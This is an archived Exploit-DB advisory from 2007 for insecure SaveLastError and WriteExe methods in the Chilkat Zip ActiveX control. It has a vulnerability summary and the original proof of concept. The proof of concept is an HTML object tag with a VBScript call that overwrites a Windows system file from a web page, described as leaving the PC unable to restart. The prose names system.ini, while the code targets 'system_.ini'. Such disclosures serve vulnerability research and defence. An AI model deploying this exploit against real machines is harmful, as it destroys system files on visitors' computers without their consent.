Chilkat Software Chilkat Zip ActiveX Component (ChilkatZip2.dll v. 12.4.2.0) 'SaveLastError()' and 'WriteExe()' Insecure Methods

vendor:

Chilkat Zip ActiveX Component

by:

shinnai

7.5

CVSS

HIGH

Insecure Methods

CWE

Product Name: Chilkat Zip ActiveX Component

Affected Version From: ChilkatZip2.dll v. 12.4.2.0

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows XP Professional SP2 with Internet Explorer 7

2007

Chilkat Software Chilkat Zip ActiveX Component (ChilkatZip2.dll v. 12.4.2.0) ‘SaveLastError()’ and ‘WriteExe()’ Insecure Methods

The 'SaveLastError()' and 'WriteExe()' methods in Chilkat Zip ActiveX Component (ChilkatZip2.dll v. 12.4.2.0) allow an attacker to overwrite the system.ini file, potentially causing the system to not restart properly. This exploit is for educational purposes only and should be used at your own risk.

Mitigation:

Make a copy of the system.ini file before running this exploit to prevent any damage. Update to a newer version of the Chilkat Zip ActiveX Component that addresses this vulnerability.

Source

Exploit-DB raw data:

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">------------------------------------------------------------------------------
 <b>Chilkat Software Chilkat Zip ActiveX Component (ChilkatZip2.dll v. 12.4.2.0)
 "SaveLastError()" and "WriteExe()" Insecure Methods</b>
 
 url: http://www.chilkatsoft.com/

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not be responsible for any damage.
 
 <b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF
 IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b>

 This control is marked as:
 <b>RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 IDisp Safe: Safe for untrusted: caller, data
 IPersist Safe: Safe for untrusted: caller, data
 IPStorage Safe: Safe for untrusted: caller, data
 KillBitSet: Falso</b>

 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
------------------------------------------------------------------------------
<object classid='clsid:DB90DEA9-0897-4B02-9FE0-1E321A22EAB0' id='test'></object>

<script language='vbscript'>
    test.SaveLastError "c:\windows\system_.ini"
    MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"Chilkat Zip")
</script>
</span>
</code></pre>

# milw0rm.com [2007-07-07]